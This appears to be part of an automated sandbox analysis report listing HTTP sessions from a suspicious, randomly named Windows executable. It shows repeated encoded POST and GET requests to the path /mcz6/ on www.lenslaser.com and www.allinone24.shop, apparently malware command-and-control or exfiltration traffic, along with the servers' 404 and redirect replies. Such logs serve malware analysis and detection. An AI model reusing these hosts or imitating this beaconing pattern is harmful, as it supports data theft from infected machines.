                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.949717162.241.216.140801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:08.836431980 CEST1769OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 4a 41 36 63 31 49 54 65 63 69 34 6e 30 59 68 52 38 30 64 6e 46 58 2f 30 35 49 79 39 4f 6a 39 46 73 4e 50 62 71 70 61 4c 44 6d 69 33 59 66 4e 4e 53 54 35 70 2b 50 4b 65 43 4d 57 70 4a 59 31 4e 39 34 56 2b 6d 53 58 73 34 55 65 74 75 6d 38 31 38 36 4a 72 72 66 31 72 61 38 74 53 4b 4d 42 57 57 2f 38 30 41 47 34 38 39 6d 45 38 78 77 35 4f 42 45 44 6a 63 39 57 52 6e 47 71 6c 56 73 49 71 46 57 73 64 42 32 66 52 6d 57 57 36 4b 79 39 4c 4e 4a 55 59 77 73 56 56 35 76 30 44 6d 31 69 30 74 70 78 55 6c 58 6e 6a 71 42 72 4d 38 44 53 67 48 5a 36 77 39 63 39 44 4d 50 72 41 2b 54 4d 30 66 42 57 79 33 76 46 6f 4b 6e 49 38 73 6d 45 36 35 64 72 74 6e 38 2b 49 70 61 38 7a 54 4a 41 75 52 4a 2f 58 7a 32 54 75 49 2b 42 58 39 62 55 4f 31 59 32 43 57 4a 63 33 69 75 58 61 62 2f 79 4e 67 4a 4e 4a 68 47 45 7a 70 77 4f 34 48 34 36 75 49 36 4b 2f 46 5a 57 66 31 32 64 56 76 6a 52 38 4b 66 57 47 [TRUNCATED]
                                                    Data Ascii: 1Joh=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmJA6c1ITeci4n0YhR80dnFX/05Iy9Oj9FsNPbqpaLDmi3YfNNST5p+PKeCMWpJY1N94V+mSXs4Uetum8186Jrrf1ra8tSKMBWW/80AG489mE8xw5OBEDjc9WRnGqlVsIqFWsdB2fRmWW6Ky9LNJUYwsVV5v0Dm1i0tpxUlXnjqBrM8DSgHZ6w9c9DMPrA+TM0fBWy3vFoKnI8smE65drtn8+Ipa8zTJAuRJ/Xz2TuI+BX9bUO1Y2CWJc3iuXab/yNgJNJhGEzpwO4H46uI6K/FZWf12dVvjR8KfWGZwKhWKoLiYdiJJUWfeuwhliItm7XCm0rEjbmLxOHpdhHGkDELDS0mXIoY/38wk20LqS6Yje5MyB7ca8xGmqUPhBiKw4KCeMViMab1EkrXdYg1Gp/suuIzCcQWEkYZwwjPHnDn35JwtWaRTvGawdTuTNxJ3eKCe3lsoAqjpyDA0B9pM5PiKRkuHb2TH3dEt37BAKamLMrafIylBNGas7N76hWvSRH+iY3VR1L7Z3oHSY5yP+eX3pV3p16x2FLjITm4/cqpLII05OkHbVHQBQfmwMv7sU86zNLwzgLfgxZWROAXd+ZCmpv/UGZE3sqn/G8+3TVh/l35aYlBVZQawv75H5m4RkvZ+12DcoUrV58b1dVzkhStZOlt2lAZxCVADf70j9iU/YTubAGybD/AkQh3kyUy8jX6Qd12xkBykrCZWW2PjQ8erE0Si7LODg2VDk9MNGC+cvHlIOyttbB05i7aoLd1gMAjg1Om7AIjRE/FKE+Zb+eS/zTJIvk20WUSErNBonD3d7l4ln97iq7eQzl4Q3XLhT6GZUB7gUpgcgef5w0Ywhp5ptpwsHI32HUb0HNaoB4NCvGMlSlNxT/izKK//uMBI6awXl0yhqa59W9jYkl7tJ7seoS42WIaa71K1R3bMglJnmTIK2lT6nIRZs6rteo5RbRg6E2XI [TRUNCATED]
                                                    May 16, 2024 17:19:09.538666964 CEST479INHTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:09 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.949718162.241.216.140801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:11.367878914 CEST473OUTGET /mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:19:12.440829039 CEST479INHTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:12 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.94971957.151.38.169801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:19.363163948 CEST738OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.allinone24.shop
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.allinone24.shop
                                                    Referer: http://www.allinone24.shop/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 53 37 6f 45 71 4a 4c 49 38 54 31 71 51 55 44 50 32 77 37 48 50 36 5a 65 66 69 69 64 77 4c 69 46 6d 75 74 50 73 6b 37 7a 6a 70 2f 42 66 36 39 57 79 63 35 71 2b 4d 6c 37 6d 32 57 48 47 65 39 70 43 52 59 61 4d 2f 6c 72 4e 39 72 74 4f 38 47 56 49 35 4e 69 64 5a 43 5a 4e 41 4a 58 55 31 2b 37 66 65 77 43 5a 6b 72 49 50 4f 43 5a 44 78 33 51 44 62 41 54 6d 66 31 54 50 6f 34 2f 77 69 63 46 7a 48 69 7a 69 69 64 31 4d 65 30 54 51 4e 69 73 54 56 53 58 41 7a 53 4a 48 62 73 31 41 30 78 4e 65 79 61 46 47 46 35 2f 79 61 68 4f 62 43 69 47
                                                    Data Ascii: 1Joh=vXcZFtPhEKWJS7oEqJLI8T1qQUDP2w7HP6ZefiidwLiFmutPsk7zjp/Bf69Wyc5q+Ml7m2WHGe9pCRYaM/lrN9rtO8GVI5NidZCZNAJXU1+7fewCZkrIPOCZDx3QDbATmf1TPo4/wicFzHiziid1Me0TQNisTVSXAzSJHbs1A0xNeyaFGF5/yahObCiG
                                                    May 16, 2024 17:19:20.155518055 CEST345INHTTP/1.1 308 Permanent Redirect
                                                    Date: Thu, 16 May 2024 15:19:19 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 164
                                                    Connection: close
                                                    Location: https://www.allinone24.shop/mcz6
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.94972057.151.38.169801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:21.898890018 CEST762OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.allinone24.shop
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.allinone24.shop
                                                    Referer: http://www.allinone24.shop/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 57 46 6e 50 64 50 74 67 58 7a 67 70 2f 42 47 4b 39 4b 32 63 35 68 2b 4d 70 46 6d 7a 57 48 47 65 70 70 43 54 41 61 4d 4e 4e 6b 4c 74 72 76 44 63 47 4c 46 5a 4e 69 64 5a 43 5a 4e 41 63 41 55 30 61 37 63 75 41 43 5a 41 33 4c 46 75 43 47 54 68 33 51 4a 37 41 74 6d 66 30 32 50 71 4e 69 77 67 55 46 7a 47 53 7a 6a 33 68 32 48 65 30 52 65 74 6a 5a 43 30 44 61 42 77 57 54 47 49 6b 75 53 30 70 2b 51 7a 36 62 58 33 77 6b 6e 4e 68 70 63 6c 72 75 54 4a 42 4d 46 71 44 32 72 78 55 6c 53 35 69 43 41 35 58 59 68 77 3d 3d
                                                    Data Ascii: 1Joh=vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5WFnPdPtgXzgp/BGK9K2c5h+MpFmzWHGeppCTAaMNNkLtrvDcGLFZNidZCZNAcAU0a7cuACZA3LFuCGTh3QJ7Atmf02PqNiwgUFzGSzj3h2He0RetjZC0DaBwWTGIkuS0p+Qz6bX3wknNhpclruTJBMFqD2rxUlS5iCA5XYhw==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.94972157.151.38.169801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:24.486053944 CEST1775OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.allinone24.shop
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.allinone24.shop
                                                    Referer: http://www.allinone24.shop/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 52 62 59 45 6f 6f 4c 49 39 7a 31 70 4d 6b 44 50 34 51 37 44 50 36 56 65 66 6a 6d 4e 7a 35 4f 46 6d 39 56 50 73 48 44 7a 68 70 2f 42 4f 71 39 61 32 63 35 47 2b 4d 68 42 6d 7a 53 35 47 63 52 70 43 77 49 61 4b 35 5a 6b 46 74 72 76 63 4d 47 4b 49 35 4e 33 64 5a 53 46 4e 41 4d 41 55 30 61 37 63 74 59 43 51 30 72 4c 44 75 43 5a 44 78 33 55 44 62 41 57 6d 66 73 41 50 71 49 56 77 54 4d 46 7a 6d 43 7a 75 68 31 32 59 75 30 58 64 74 6a 42 43 30 4f 61 42 78 36 78 47 4c 34 49 53 33 4a 2b 55 69 62 2f 42 30 55 51 38 2b 78 59 62 6e 66 54 63 2b 4e 32 4c 61 36 4c 2f 55 4d 33 45 59 6e 7a 45 59 75 4d 2b 74 63 6a 6f 31 31 4a 72 56 46 33 68 43 4d 77 45 65 65 78 39 47 6b 6d 39 45 43 48 78 75 6f 4e 57 39 59 47 73 62 6c 62 63 75 78 63 68 69 63 70 7a 51 57 67 70 68 6b 6a 76 57 58 55 61 34 49 39 34 64 44 2b 52 6b 79 6f 77 4f 6e 54 62 55 2f 39 36 48 4b 44 33 4d 46 75 52 53 2f 4b 4c 6d 79 4d 54 61 32 71 54 34 65 52 70 6d 4d 56 5a 66 67 4d 73 56 38 49 52 44 74 57 4b 50 31 75 53 [TRUNCATED]
                                                    Data Ascii: 1Joh=vXcZFtPhEKWJRbYEooLI9z1pMkDP4Q7DP6VefjmNz5OFm9VPsHDzhp/BOq9a2c5G+MhBmzS5GcRpCwIaK5ZkFtrvcMGKI5N3dZSFNAMAU0a7ctYCQ0rLDuCZDx3UDbAWmfsAPqIVwTMFzmCzuh12Yu0XdtjBC0OaBx6xGL4IS3J+Uib/B0UQ8+xYbnfTc+N2La6L/UM3EYnzEYuM+tcjo11JrVF3hCMwEeex9Gkm9ECHxuoNW9YGsblbcuxchicpzQWgphkjvWXUa4I94dD+RkyowOnTbU/96HKD3MFuRS/KLmyMTa2qT4eRpmMVZfgMsV8IRDtWKP1uSJscA/25Q5Og/xPxI+y8d5GLAZlXRrzhyh4R8YMMNdaW6LdfdhAK4517ss7pbMDqRSa2vZ0noXma0ekAKzCZ7glqx0FnL+6j/ZPO4DSqi0cxIQSaqBVXzyCTPf/qEUzL4+qsmB8j2DyErZyMZfiY2+xnTkiEhxK7S1uC7wbyiNdZXi4eH1mKaA60Y8Q6dnJPvG5lxcjaekP2I0rBh0C6f3k4yI8HP3D0LQXPoOku5jyowQ7E0bEgctVLBRNf/pSSpXR5RIIGc+MM4uLGnTBCPIAAcELGujP3xNyvYpmUB4OsnRgXfAciGB+BIzIR16naYo1/RGBr9hcTDRyDBOdbbiquN0OolCexk5SIAZWjppk6mF8dWt5WdhiLo8dKiXJuJA0IOFPOhmixWPAGbgOvzC245YLwFeTtah5GKvf9rbWEkPrWI1BXejVETJdbelyAw7qd1HBXT3hQ2vms1tLJnWKn6MYCJHHhfDZ5mbFZif4D7ozelNJmZCQ1se9o0DaV8w3RZlpYRKxwRd+M5IomQB/TM5nyK3OCvuAWKFOtwtH6Eq+wwWJ6pvH7wLH6s21j4NDBIRJhN67h3TZjdQ1F5IbYnw3g7Fgm8rIKsI95yyR4B3avREJldyabatSSVyXOzpZgVO/F48jB0f/CHJnY9wp0JIgYipoWony [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.94972257.151.38.169801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:27.047625065 CEST475OUTGET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1gMpqWDMKZB4BsRbutJiIudg/fevYEHw== HTTP/1.1
                                                    Host: www.allinone24.shop
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:19:29.256321907 CEST488INHTTP/1.1 308 Permanent Redirect
                                                    Date: Thu, 16 May 2024 15:19:28 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 164
                                                    Connection: close
                                                    Location: https://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1gMpqWDMKZB4BsRbutJiIudg/fevYEHw==
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 38 20 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>308 Permanent Redirect</title></head><body><center><h1>308 Permanent Redirect</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.949723162.241.216.140801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:34.590842962 CEST732OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4b 56 61 53 6b 48 6c 75 38 33 50 4c 61 58 2b 64 56 55 47 57 72 63 4b 72 4e 71 67 71
                                                    Data Ascii: 1Joh=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtKVaSkHlu83PLaX+dVUGWrcKrNqgq
                                                    May 16, 2024 17:19:35.267997980 CEST479INHTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:35 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.949724162.241.216.140801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:37.117289066 CEST756OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
